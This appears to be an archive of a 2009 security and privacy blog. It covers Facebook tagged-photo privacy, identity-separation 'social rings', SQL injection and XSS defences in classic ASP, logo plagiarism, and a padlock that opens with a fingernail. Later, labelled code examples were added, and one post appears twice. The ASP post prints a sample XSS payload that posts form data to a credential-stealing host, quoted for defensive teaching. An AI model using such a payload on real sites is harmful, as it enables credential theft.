Monday, December 7, 2009

Understanding Facebook Tagged Photos Privacy

We discuss how to enhance the privacy of Facebook when facing users tagging you in third-party pictures.

To understand the tagged-photo privacy features of Facebook we set up a Facebook usage lab. Our laboratory includes three individuals who graciously volunteered to take part in the tests. Bob is in Alice's contact list because he is her lover, and Chuck is in her contact list because he is her official partner. Chuck suspects that Alice is unfaithful, but he needs evidence to drag Alice into a vortex of unhappiness and sorrow.

Each of the users uploaded one picture: PhotoB, PhotoA and PhotoC respectively. The critical photo is PhotoB, uploaded by Bob, in which Alice appears.
In Facebook, a user can tag photos with names. If the name belongs to a contact of the user, the tag is linked to other public photos of that contact. The privacy features of tagged photos are centered around:

a) who can view the photos published by user A and
b) who can view the photos where user B was tagged.

We will briefly discuss the scenario where Bob tags Alice in his photo, with the default configuration.
By default, Bob's photos are visible only to his friends, in this case Alice and not Chuck. But if one day Bob needs to share something and changes his profile privacy from "Only Friends" to "Friends of Friends" (Settings > Privacy > Profile > Profile), then Chuck will notice in his Facebook feed that Alice was tagged in a photo owned by Bob. This is due to Alice's default tagged-photo visibility setting, "Only Friends", which lets her friends view the photos where she was tagged. If Alice changes her tagged-photos setting to "Only Me" (Settings > Privacy > Profile > Photos Tagged of You > Customize... > Only Me), then Chuck will not see the critical PhotoB.
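The scenario above as an added example (not part of the original post): a small model in which a viewer sees a tagged photo only when both the owner's photo audience and the tagged person's "Photos Tagged of You" audience admit them. The friend graph is constructed and the evaluation rules are a simplification, not Facebook's implementation.

```python
# Added example (not from the original post): a model of how a photo owner's
# audience and a tagged person's "Photos Tagged of You" audience combine for a
# viewer. The people and PhotoB are the post's scenario; the friend graph is
# constructed and the rules are a simplification, not Facebook's implementation.

# Constructed friendships (symmetric). Bob and Chuck are not friends.
FRIENDS = {
    "Alice": {"Bob", "Chuck"},   # Bob: her lover; Chuck: her official partner
    "Bob": {"Alice"},
    "Chuck": {"Alice"},
}

# PhotoB: uploaded by Bob, with Alice tagged in it.
PHOTO_B = {"owner": "Bob", "tagged": {"Alice"}}

def default_settings():
    """Per-user audiences as the post describes the 2009 defaults."""
    return {u: {"photos": "Only Friends", "tagged": "Only Friends"} for u in FRIENDS}

def friends_of_friends(user):
    """Everyone within two hops of `user`, excluding the user."""
    reach = set(FRIENDS[user])
    for friend in FRIENDS[user]:
        reach |= FRIENDS[friend]
    reach.discard(user)
    return reach

def audience_allows(setting, owner, viewer):
    """Does an audience setting owned by `owner` admit `viewer`?"""
    if viewer == owner:
        return True
    if setting == "Only Me":
        return False
    if setting == "Only Friends":
        return viewer in FRIENDS[owner]
    if setting == "Friends of Friends":
        return viewer in friends_of_friends(owner)
    raise ValueError(f"unknown audience {setting!r}")

def can_see_tag(photo, tagged_user, settings, viewer):
    """Two gates must both open: the owner's photo audience and the tagged
    person's tagged-photos audience. The second is the only one the tagged
    person controls, which is why "Only Me" hides PhotoB from Chuck even
    after Bob widens his own audience."""
    if tagged_user not in photo["tagged"]:
        return False
    owner_gate = audience_allows(settings[photo["owner"]]["photos"], photo["owner"], viewer)
    tag_gate = audience_allows(settings[tagged_user]["tagged"], tagged_user, viewer)
    return owner_gate and tag_gate

def walk_through():
    """Replays the post's three steps; returns whether Chuck sees Alice's tag."""
    s = default_settings()
    step1 = can_see_tag(PHOTO_B, "Alice", s, "Chuck")   # defaults: hidden
    s["Bob"]["photos"] = "Friends of Friends"
    step2 = can_see_tag(PHOTO_B, "Alice", s, "Chuck")   # Bob opens up: visible
    s["Alice"]["tagged"] = "Only Me"
    step3 = can_see_tag(PHOTO_B, "Alice", s, "Chuck")   # Alice closes her gate: hidden
    return step1, step2, step3
```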

To search for photos and test their visibility you can use "photo_search.php":

http://www.facebook.com/photo_search.php?id=USER_NUMERICAL_ID

It lists the photos visible to the currently logged-in user. These photos can come from the profile of user A, whose numerical identification is USER_NUMERICAL_ID, or from another user's album where user A is tagged.

Join the privacy lab via Facebook (Alice, Bob and Chuck) or the Data Privacy Army if you want to contribute scenarios or comments!

Tuesday, December 1, 2009

Social Rings: A Simple Method For Enhancing Privacy In Web 2.0 And Social Networks


Disclaimer: This post was written for the annoyingly paranoid.

If you are worried about your privacy but don't want to be isolated on the Internet, you may want to implement social rings. Here we describe the simple method we devised for enabling a little privacy in web 2.0 and social networks. We define four privacy levels, or social rings, for accessing the web and contacting people through social network services. Keep in mind that as long as the other abstract communication layers don't provide any privacy, your privacy is probably being invaded by your local ISP, government intelligence/security agency or employer.

This method includes human and automated computer interactions. We have been testing it for about a year and it provides a clearer understanding of privacy on the Internet, given the little effort of managing the different rings. It is designed to avoid phishing and spamming and to optimize your mindshare/attention online, a limited resource.
  • Social Ring 0 (The Circle Of Trust or The Social Circle): Include here close friends, trusted co-workers and trusted family members. Create an e-mail address for this ring. Identify yourself with your complete name, but don't include your complete name in the e-mail address: you don't want people who know your complete name to deduce the address. Use this e-mail only for human-to-human contacts, not for automatic subscriptions, since the latter usually carry messages from people you don't trust. This e-mail address, not directly deducible from your complete name, will be the key/token (we will call it token0) to enter social ring 0, but assume that contacts in this ring know your complete name. Use token0 to create an account on your favorite social network service. Check that people can only contact you in this ring if they have token0. In Facebook, for example, you must not use your complete name, but you may want to be reachable by token0 in people search queries. For example, if your name is Alan Smithee you may use alans or as23 as privacy token0. People (or robots?) only enter this ring after physical contact or a personal recommendation from an existing contact. You may subscribe to news feed systems only if the feed system allows anonymous subscriptions or followers. Twitter allows anonymous subscriptions via RSS feeds, but following people on Twitter with your Twitter account is not anonymous.
  • Social Ring 1 (The News/Nickname Ring): Here go not-so-close friends, untrusted co-workers/family and automatic subscriptions/robots. Create an e-mail address with privacy token1, similarly to ring 0 but now with a token completely uncorrelated with your complete name. Don't use your complete name anywhere within this ring (!); use a simple nickname, such as alan666 or morfeus. Using token1 you can subscribe to people and systems that only support non-anonymous subscriptions, such as Twitter. E-mail newsletters and lists are included in this ring because they qualify as an interaction with an untrusted machine, possibly aggregating content and spam from people you don't know. Don't use token1 for possibly spammish subscriptions or for people/social network systems suspected of being malicious. You may want to use your complete name in blogs and services associated with token1, but only for publishing content, not consuming it.
  • Social Ring 2 (Social Event Horizon): Create a totally uncorrelated social key, token2, for this ring. Use it for subscriptions/services you don't trust at the moment. You can probe suspicious services or people comfortably from inside this ring. Surely you will need an e-mail address for this ring.
  • Social Ring 3 (The Anonymous Moors): Anonymous polls, anonymous comments in web forums, no credentials needed. As you can be approximately geographically located, you may want to use anonymizing networks such as Tor to avoid geographical bans or censorship. Remember not to use any ring 0-2 credentials in this ring.
Possible improvements include a Social Ring -1 with an encrypted web vault for storing personal data such as financial information, other critical data and the Social Ring 0-2 credentials.

You want to avoid scenarios where people/machines can deduce token{n-1} from token{n}, since that lets them elevate their social ring level.
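As an added example (not from the original post), a small checker for the rule just stated: no lower-ring token should be deducible from a higher-ring one, and tokens for rings 1 and up should not be correlated with the complete name, while token0 may be correlated but must not contain it. The correlation heuristics (a shared run of three letters, or the initials of the name plus filler) and the sample tokens are my own constructions.

```python
import re

# Added example (not from the original post): checks a ring layout against the
# post's rule that token{n-1} must not be deducible from token{n}. The
# correlation heuristics below are a simplification chosen for this example.

def longest_common_substring(a, b):
    """Length of the longest run of characters that a and b share."""
    best = 0
    prev = [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        cur = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                cur[j] = prev[j - 1] + 1
                best = max(best, cur[j])
        prev = cur
    return best

def normalize(text):
    """Lower-case letters only: digits and punctuation add little entropy."""
    return re.sub(r"[^a-z]", "", text.lower())

def correlated(token, source, min_shared=3):
    """True if someone holding `source` could plausibly guess `token`: they
    share a run of at least min_shared letters, or the token is the initials
    of a multi-word source plus filler (the post's own as23 for Alan Smithee)."""
    tok, src = normalize(token), normalize(source)
    if not tok or not src:
        return False
    if longest_common_substring(tok, src) >= min_shared:
        return True
    initials = "".join(part[0] for part in source.lower().split())
    return len(initials) >= 2 and tok == initials

def audit_rings(full_name, tokens):
    """tokens[n] is the handle/e-mail (token_n) of ring n. Returns the broken
    rules as strings; an empty list means the layout holds. Ring 0 may be
    correlated with the name (its contacts know it) but may not contain it."""
    problems = []
    name = normalize(full_name)
    for n, tok in enumerate(tokens):
        if name and name in normalize(tok):
            problems.append(f"token{n} contains the complete name")
        if n >= 1 and correlated(tok, full_name):
            problems.append(f"token{n} is correlated with the complete name")
        # Anyone holding token_m (m > n) must not be able to climb to ring n.
        for m in range(n + 1, len(tokens)):
            if correlated(tok, tokens[m]):
                problems.append(f"token{n} can be deduced from token{m}")
    return problems
```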

Please comment on any bugs in the method or possible improvements.

(Last photo courtesy of lois_15354.)

Thursday, November 26, 2009

Another Categorization of Social Networking Data

Following Bruce Schneier's post on social network data taxonomies, I made my own categorization. You will observe that it is not a taxonomy, because a piece of data is not exclusively in one category; that is, the categories are not disjoint. It is a categorization centered on data destination: the places and people that can store it, access it and use it. Schneier's taxonomy, I think, is centered on trust levels.
  1. Collected Data. Data collected by the service provider. Unless this data is encrypted on the client side and stored that way on the server, we assume it is plain-text data accessible by the service provider. It usually includes profile and network data explicitly provided by the user, and click history implicitly provided. You can assume that everything you do and upload in the browser tab of the service is collected, unless the privacy policy of the service states otherwise.
  2. Public/Disclosed Data. Data that is published openly, such as your complete name or e-mail. It can be useful for other people trying to locate you.
  3. Social Data. Data that is openly shared with your trusted contacts. Unless these contacts are inside your circle of trust, they can't access it.
  4. Monetized Data. Data that is actually used by the service provider to serve you personalized advertising. This category also includes data that can be sold, anonymized or aggregated, to third parties.
You can observe that in some services, such as web logs, all social data is public/disclosed. It is common nowadays for the service provider to collect all the data, so the public/disclosed data and the social data are included in the collected data. On the other side, an encrypted social network service could possibly assure a minimization of collected data. Obviously, monetized data can only be extracted from data collected by the provider. If the social data can be widely collected by other users infiltrating your social contact list, they can build a dataset that can be turned into monetized data. Another example is Google's Social Graph effort: they are transforming part of your social data in services they can't access into public/disclosed data that fits better inside their business model.

Some ideas in this post are related to Alex Iskold's post on attention silos.

Thursday, November 19, 2009

Basic Precautions to Avoid Web Attacks in ASP

We review some basic web security concepts and, browsing the web, discuss some solutions to avoid attacks on web applications developed with ASP.

As with every security flaw, technology developed before the flaw became widely known is a sure victim of it. That is the case with ASP: only in ASP .Net did awareness of the usual security flaws in SQL and JavaScript arrive, with countermeasures included by default, at least in the libraries.

The main flaws affecting ASP are those affecting most web applications: injection of JavaScript code and SQL code inside the data sent to the application. Injection of code inside data sent to programs is a central category of security flaws. In the classic case of native applications, machine code is injected inside data sent to servers written in C/C++, or inside multimedia data to attack web or mail clients also written in C/C++.

In the case of an SQL injection flaw, the execution of an SQL statement on the server can be affected or diverted by user-supplied data. Usually, because the SQL statement is mixed as a character string with the input supplied by the user/attacker, the latter can break out of the SQL statement with some character such as a single or double quote and then append SQL to the existing statement or execute a different one (for example with ";" in MS SQL Server). The usual impact is bypassing authentication by entering the system as administrator or listing the user table, although, depending on the SQL database permissions, it may also be possible to modify data tables or execute system shell commands [1].

JavaScript injections, also known as XSS or Cross-site Scripting, look more harmless because in principle they affect the users' client web browsers, but besides serving to steal user credentials they can serve to overload the server with requests. JavaScript is injected into the data and reflected in the HTML that is returned; if the injection can be persisted or reproduced with a URL (GET-request XSS), victims can then access it and their session cookies could eventually be stolen. For POST requests it is enough to direct the victims to the domain "notanevilhacker.org" and from there send the POST with the XSS to the domain "vulnerable.org" to steal credentials [2].

In general, the best way to avoid SQL injection is sanitizing input data. For example, in ASP you can let through only alphanumeric data (white-listing) with the following code [3]. In this case the complement of the alphanumeric set is filtered with "^". Letters with accents used in Spanish, which are not in this example, should possibly be included. Note that white-listing is always preferable to black-listing, because in the latter case some unfiltered case can slip past tangentially; ergo, the security tortoise escapes us through some uncovered case.
'Create a regular expression object
Dim regEx
Set regEx = New RegExp

'This global property tells the RegEx engine to look for ALL the
'substrings, instead of only the first occurrence. It has to be true.
regEx.Global = True

'Our pattern says what to look for in the string... In this case
'we look for things that are not alphanumeric...
regEx.Pattern = "[^0-9a-zA-Z]"

'We use the RegEx replace function to clean the username. The replace
'function takes a string to search (using the pattern above as criterion)
'and the string that will replace it.
'In this case we want to replace with nothing, because the non-alphanumeric
'characters are the ones we want to remove.
Dim username
username = regEx.Replace(Request.Form("UserName"), "")
For XSS, if the user input includes non-alphanumeric characters, the best option is to encode the input so that it is interpreted as data in the returned HTML, and not as HTML itself. In ASP the function providing this functionality is "Server.HtmlEncode" [4].

For example, the malicious input:
</form>
<form method="POST"
action="www.hax0r.com/passwordstealer.asp">
is replaced by:
&lt;/form&gt;&lt;form
method="POST"
action="www.hax0r.com/passwordstealer.asp"&gt;
We can observe that if both kinds of vulnerabilities appear together, since the filtering to avoid SQL injection is more restrictive, applying that alone will surely suffice, without the HTML encoding. If we have already been victims of an attack, the best thing is to try to remove leftover malicious JavaScript code from the database [5].
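Putting the two measures of this post together in one classic ASP page, as an added example that is not code from the original post or its references: the white-list filter extended with the Spanish accented letters, Server.HTMLEncode on output, and, going beyond what the post covers, the query issued with a bound ADODB parameter instead of string concatenation. The "users" table, the "username" column, the UserName and Comment form fields and Application("ConnectionString") are placeholders assumed for this example.

```vbscript
<%
Option Explicit
' Added example (not from the original post): the post's white-list filter,
' Server.HTMLEncode on output and, beyond what the post covers, a parameterised
' ADODB query. The "users" table, the "username" column, the form fields and
' Application("ConnectionString") are placeholders for this example.

' White-list: keep letters (including the Spanish accented ones the post says
' are missing from its example), digits and underscore; drop everything else.
Function WhiteListUserName(rawValue)
    Dim regEx
    Set regEx = New RegExp
    regEx.Global = True
    regEx.Pattern = "[^0-9a-zA-Z_áéíóúüñÁÉÍÓÚÜÑ]"
    WhiteListUserName = regEx.Replace(rawValue & "", "")
End Function

Dim rawUser, cleanUser
rawUser = Request.Form("UserName")
cleanUser = WhiteListUserName(rawUser)

' UNSAFE, the pattern the post describes: the raw value becomes part of the
' SQL text, so a quote or ";" in it changes the statement.
'   sql = "SELECT id FROM users WHERE username = '" & rawUser & "'"

' SAFE: the value is bound as a parameter and never parsed as SQL, so the
' white-list above becomes defence in depth rather than the only barrier.
Dim conn, cmd, rs
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnectionString")
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "SELECT id FROM users WHERE username = ?"
' 200 = adVarChar, 1 = adParamInput, 50 = maximum length of the value
cmd.Parameters.Append cmd.CreateParameter("username", 200, 1, 50, cleanUser)
Set rs = cmd.Execute

If rs.EOF Then
    Response.Write "<p>Unknown user.</p>"
Else
    ' Already white-listed, so encoding is redundant here (the post's last
    ' point), but it costs nothing and survives a later relaxing of the filter.
    Response.Write "<p>Welcome, " & Server.HTMLEncode(cleanUser) & "</p>"
End If

' A free-text field cannot be reduced to alphanumerics, so it is encoded on
' output instead: the post's </form><form ...> payload reaches the browser as
' &lt;/form&gt;&lt;form ...&gt; and is rendered as text, not as markup.
Response.Write "<p>" & Server.HTMLEncode(Request.Form("Comment")) & "</p>"

rs.Close
conn.Close
%>
```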

Wednesday, November 11, 2009

Detecting Shameless Logo Plagiarism!

I guess we must clarify a language confusion here. As we are talking about intangible assets, information, we use the words steal and theft only to refer to the act of plagiarism. It is immoral when no reference to the original author is made explicit, since it is then assumed that the copied logo is an original work of the graphic designer. No logo is completely original, as particular features are always present in other logos, but plagiarism is assumed when many features are present in more than one logo.

It's very funny to observe that, to save money and time, some companies copy (steal?) the iconographic logos of other companies. In some cases the small ones copy from the bigger ones, and in other cases it is the other way around.

I recommend using the wonderful photo search engine called TinEye, plus the Firefox TinEye plugin. In this case it is very clear that the photo similarity search of the service is a perfect fit for detecting logo clones (thefts?).

These posts (part 1, part 2), written by a logo design company, explain the details and techniques for shamelessly copying a complete logo or part of it. For example, they show the similarities between the Sun Microsystems logo and the Columbia Sportswear logo. I tried to use TinEye to detect the Sun/Columbia similarities but failed.
The article Protecting Your Custom Company Logo Design's Copyright explains how to legally protect your logo; I guess it is only useful when an explicit copy of your logo is made (and your logo is original enough to be considered something that can be copied!).

A plagiarism example I detected with TinEye was the Kibon plagiarism (page 1, page 2). Kibon was an ice-cream brand some years ago, but the logo is also used by Olá, Good Humor and Wall's. Apparently these ice-cream brands are all owned by Unilever, so they use the same logo in many places. But at least it is not clear who designed the logo. On the site Brands Of The World you can find the different logos: Olá (Portugal), Kibon (Brazil) and Wall's.
The TinEye approach also did not work for detecting one of my favorite plagiarisms: Livra (a prosumer web company from Argentina) versus CounterPath (a VoIP client software company).
We can conclude that plagiarism is usually accepted within an organisation, because the organisation owns the copyright of the logo and can reuse and modify it without permission from the original graphic designer, whether or not they work for the company.

Finally, the Swiss site Plagiat is completely devoted to plagiarism in its various forms.

Sunday, September 20, 2009

Basic Lockpicking Kit!

I wanted to get into the world of physical security! So I bought a basic lockpicking kit at the Ekoparty conference from the TOOOL people.
I didn't have anything to open with the kit (it only works on common padlocks, not lever padlocks). Then I bought a small SilverShadow padlock, 30 mm, to test the kit. This padlock is imported from China by Herralfer S.A.
The surprise was that I only had to use the small lever to open it. This padlock provides no level of security at all! You only need to turn the mechanism with something! It even worked with my fingernail!

Look at the photos with the lever; a little tension is enough.


Now a photo with my fingernail opening the padlock. No need for the kit today!

Today's moral is that it doesn't matter how strong the padlock's metal is: if the mechanism is poor, the padlock provides no security.

I will probably send a complaint to the company that imports these padlocks. Here is the information if you want to do the same:

Herralfer S.A.
www.herralfer.com.ar
CUIT 30-66108409-6
Carrasco 729/31 (C1407)
Buenos Aires - Argentina
Telefax: (5411) 4139-8978
E-mail: info@herralfer.com.ar
FABRICADO EN CHINA

Basic Lockpicking Kit!

I wanted to get into the world of physical security! So I bought a basic lockpicking kit at Ekoparty from the guys of TOOOL.
I didn't have anything that could be opened with the kit (it is only useful for classic locks, not lever locks). Then I bought a small SilverShadow lock, 30 mm, to test the kit. This lock is imported from China by Herralfer S.A.
The surprise was that I only had to use the small lever to open it. This lock doesn't provide any security at all! You just need to turn the mechanism with something! It even worked with my nail!

Check the photos with the lever; some tension is enough.


Now a photo of my nail opening the lock. No need for the kit today!

Today's moral is that the strength of the lock's metal does not matter: if the mechanism is poor, the lock does not provide security.

I will probably send a complaint to the company importing these locks. This is the information if you want to do the same:

Herralfer S.A.
www.herralfer.com.ar
CUIT 30-66108409-6
Carrasco 729/31 (C1407)
Buenos Aires - Argentina
Telefax: (5411) 4139-8978
E-mail: info@herralfer.com.ar
FABRICADO EN CHINA